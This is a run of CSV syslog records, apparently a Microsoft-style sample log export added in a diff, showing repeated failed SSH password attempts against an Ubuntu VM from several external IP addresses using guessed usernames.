+5072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:32,UbuntuDevEnv,2019-06-26 15:10:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40  user=test,18307,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,43.229.134.4,,0,
+5073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:33,UbuntuDevEnv,2019-06-26 15:10:33,auth,UbuntuDevEnv,info,Invalid user kernoops from 192.241.213.168 port 33484,18313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kernoops,192.241.213.1,33484,,
+5074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:33,UbuntuDevEnv,2019-06-26 15:10:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:33,UbuntuDevEnv,2019-06-26 15:10:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,18313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:34,UbuntuDevEnv,2019-06-26 15:10:33,auth,UbuntuDevEnv,info,Failed password for test from 43.229.134.40 port 50576 ssh2,18307,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,50576,,
+5077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:34,UbuntuDevEnv,2019-06-26 15:10:33,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 50576:11: Bye Bye [preauth],18307,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,50576,,
+5078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:34,UbuntuDevEnv,2019-06-26 15:10:33,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 43.229.134.40 port 50576 [preauth],18307,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,43.229.134.4,50576,,
+5079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:36,UbuntuDevEnv,2019-06-26 15:10:35,auth,UbuntuDevEnv,info,Failed password for invalid user kernoops from 192.241.213.168 port 33484 ssh2,18313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kernoops,192.241.213.1,33484,,
+5080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:36,UbuntuDevEnv,2019-06-26 15:10:35,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 33484:11: Bye Bye [preauth],18313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,33484,,
+5081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:36,UbuntuDevEnv,2019-06-26 15:10:35,auth,UbuntuDevEnv,info,Disconnected from invalid user kernoops 192.241.213.168 port 33484 [preauth],18313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kernoops,192.241.213.1,33484,,
+5082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:41,UbuntuDevEnv,2019-06-26 15:10:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40  user=test,18339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,43.229.134.4,,0,
+5083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:43,UbuntuDevEnv,2019-06-26 15:10:42,auth,UbuntuDevEnv,info,Failed password for test from 43.229.134.40 port 50954 ssh2,18339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,50954,,
+5084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:43,UbuntuDevEnv,2019-06-26 15:10:42,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 50954:11: Bye Bye [preauth],18339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,50954,,
+5085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:43,UbuntuDevEnv,2019-06-26 15:10:42,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 43.229.134.40 port 50954 [preauth],18339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,43.229.134.4,50954,,
+5086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:46,UbuntuDevEnv,2019-06-26 15:10:46,auth,UbuntuDevEnv,info,Invalid user qiao from 43.229.134.40 port 51334,18365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qiao,43.229.134.4,51334,,
+5087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:46,UbuntuDevEnv,2019-06-26 15:10:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:46,UbuntuDevEnv,2019-06-26 15:10:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:48,UbuntuDevEnv,2019-06-26 15:10:48,auth,UbuntuDevEnv,info,Failed password for invalid user qiao from 43.229.134.40 port 51334 ssh2,18365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qiao,43.229.134.4,51334,,
+5090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:48,UbuntuDevEnv,2019-06-26 15:10:48,auth,UbuntuDevEnv,info,Disconnected from invalid user qiao 43.229.134.40 port 51334 [preauth],18365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qiao,43.229.134.4,51334,,
+5091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:48,UbuntuDevEnv,2019-06-26 15:10:48,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 51334:11: Bye Bye [preauth],18365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,51334,,
+5092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:54,UbuntuDevEnv,2019-06-26 15:10:53,auth,UbuntuDevEnv,info,Invalid user spread from 43.229.134.40 port 51710,18392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spread,43.229.134.4,51710,,
+5093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:54,UbuntuDevEnv,2019-06-26 15:10:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:54,UbuntuDevEnv,2019-06-26 15:10:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:56,UbuntuDevEnv,2019-06-26 15:10:55,auth,UbuntuDevEnv,info,Failed password for invalid user spread from 43.229.134.40 port 51710 ssh2,18392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spread,43.229.134.4,51710,,
+5096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:56,UbuntuDevEnv,2019-06-26 15:10:55,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 51710:11: Bye Bye [preauth],18392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,51710,,
+5097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:56,UbuntuDevEnv,2019-06-26 15:10:55,auth,UbuntuDevEnv,info,Disconnected from invalid user spread 43.229.134.40 port 51710 [preauth],18392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spread,43.229.134.4,51710,,
+5098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:00,UbuntuDevEnv,2019-06-26 15:11:00,auth,UbuntuDevEnv,info,Invalid user deploy from 43.229.134.40 port 52084,18414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,43.229.134.4,52084,,
+5099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:00,UbuntuDevEnv,2019-06-26 15:11:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:00,UbuntuDevEnv,2019-06-26 15:11:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:02,UbuntuDevEnv,2019-06-26 15:11:02,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 43.229.134.40 port 52084 ssh2,18414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,43.229.134.4,52084,,
+5102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:03,UbuntuDevEnv,2019-06-26 15:11:02,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 52084:11: Bye Bye [preauth],18414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,52084,,
+5103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:03,UbuntuDevEnv,2019-06-26 15:11:02,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 43.229.134.40 port 52084 [preauth],18414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,43.229.134.4,52084,,
+5104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:06,UbuntuDevEnv,2019-06-26 15:11:05,auth,UbuntuDevEnv,info,Invalid user vali from 43.229.134.40 port 52460,18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vali,43.229.134.4,52460,,
+5105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:06,UbuntuDevEnv,2019-06-26 15:11:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:06,UbuntuDevEnv,2019-06-26 15:11:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:08,UbuntuDevEnv,2019-06-26 15:11:07,auth,UbuntuDevEnv,info,Failed password for invalid user vali from 43.229.134.40 port 52460 ssh2,18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vali,43.229.134.4,52460,,
+5108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:08,UbuntuDevEnv,2019-06-26 15:11:07,auth,UbuntuDevEnv,info,Disconnected from invalid user vali 43.229.134.40 port 52460 [preauth],18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vali,43.229.134.4,52460,,
+5109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:08,UbuntuDevEnv,2019-06-26 15:11:07,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 52460:11: Bye Bye [preauth],18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,52460,,
+5110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:15,UbuntuDevEnv,2019-06-26 15:11:15,auth,UbuntuDevEnv,info,Invalid user db2inst1 from 43.229.134.40 port 52838,18471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2inst1,43.229.134.4,52838,,
+5111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:15,UbuntuDevEnv,2019-06-26 15:11:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:15,UbuntuDevEnv,2019-06-26 15:11:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:17,UbuntuDevEnv,2019-06-26 15:11:16,auth,UbuntuDevEnv,info,Failed password for invalid user db2inst1 from 43.229.134.40 port 52838 ssh2,18471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2inst1,43.229.134.4,52838,,
+5114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:17,UbuntuDevEnv,2019-06-26 15:11:16,auth,UbuntuDevEnv,info,Invalid user taylor from 164.132.192.219 port 51731,18485,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taylor,164.132.192.2,51731,,
+5115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:17,UbuntuDevEnv,2019-06-26 15:11:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,18485,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+5116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:17,UbuntuDevEnv,2019-06-26 15:11:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18485,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:17,UbuntuDevEnv,2019-06-26 15:11:17,auth,UbuntuDevEnv,info,Disconnected from invalid user db2inst1 43.229.134.40 port 52838 [preauth],18471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2inst1,43.229.134.4,52838,,
+5118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:17,UbuntuDevEnv,2019-06-26 15:11:17,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 52838:11: Bye Bye [preauth],18471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,52838,,
+5119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:19,UbuntuDevEnv,2019-06-26 15:11:18,auth,UbuntuDevEnv,info,Failed password for invalid user taylor from 164.132.192.219 port 51731 ssh2,18485,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taylor,164.132.192.2,51731,,
+5120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:19,UbuntuDevEnv,2019-06-26 15:11:18,auth,UbuntuDevEnv,info,Disconnected from invalid user taylor 164.132.192.219 port 51731 [preauth],18485,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taylor,164.132.192.2,51731,,
+5121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:19,UbuntuDevEnv,2019-06-26 15:11:18,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 51731:11: Bye Bye [preauth],18485,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,51731,,
+5122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:22,UbuntuDevEnv,2019-06-26 15:11:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:22,UbuntuDevEnv,2019-06-26 15:11:21,auth,UbuntuDevEnv,info,Invalid user ts3server1 from 43.229.134.40 port 53212,18502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3server1,43.229.134.4,53212,,
+5124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:22,UbuntuDevEnv,2019-06-26 15:11:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:24,UbuntuDevEnv,2019-06-26 15:11:23,auth,UbuntuDevEnv,info,Failed password for invalid user ts3server1 from 43.229.134.40 port 53212 ssh2,18502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3server1,43.229.134.4,53212,,
+5126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:24,UbuntuDevEnv,2019-06-26 15:11:23,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 53212:11: Bye Bye [preauth],18502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,53212,,
+5127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:24,UbuntuDevEnv,2019-06-26 15:11:23,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3server1 43.229.134.40 port 53212 [preauth],18502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3server1,43.229.134.4,53212,,
+5128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:28,UbuntuDevEnv,2019-06-26 15:11:28,auth,UbuntuDevEnv,info,Invalid user egarcia from 47.254.147.170 port 54858,18528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,egarcia,47.254.147.1,54858,,
+5129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:28,UbuntuDevEnv,2019-06-26 15:11:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,18528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+5130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:28,UbuntuDevEnv,2019-06-26 15:11:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:30,UbuntuDevEnv,2019-06-26 15:11:30,auth,UbuntuDevEnv,info,Failed password for invalid user egarcia from 47.254.147.170 port 54858 ssh2,18528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,egarcia,47.254.147.1,54858,,
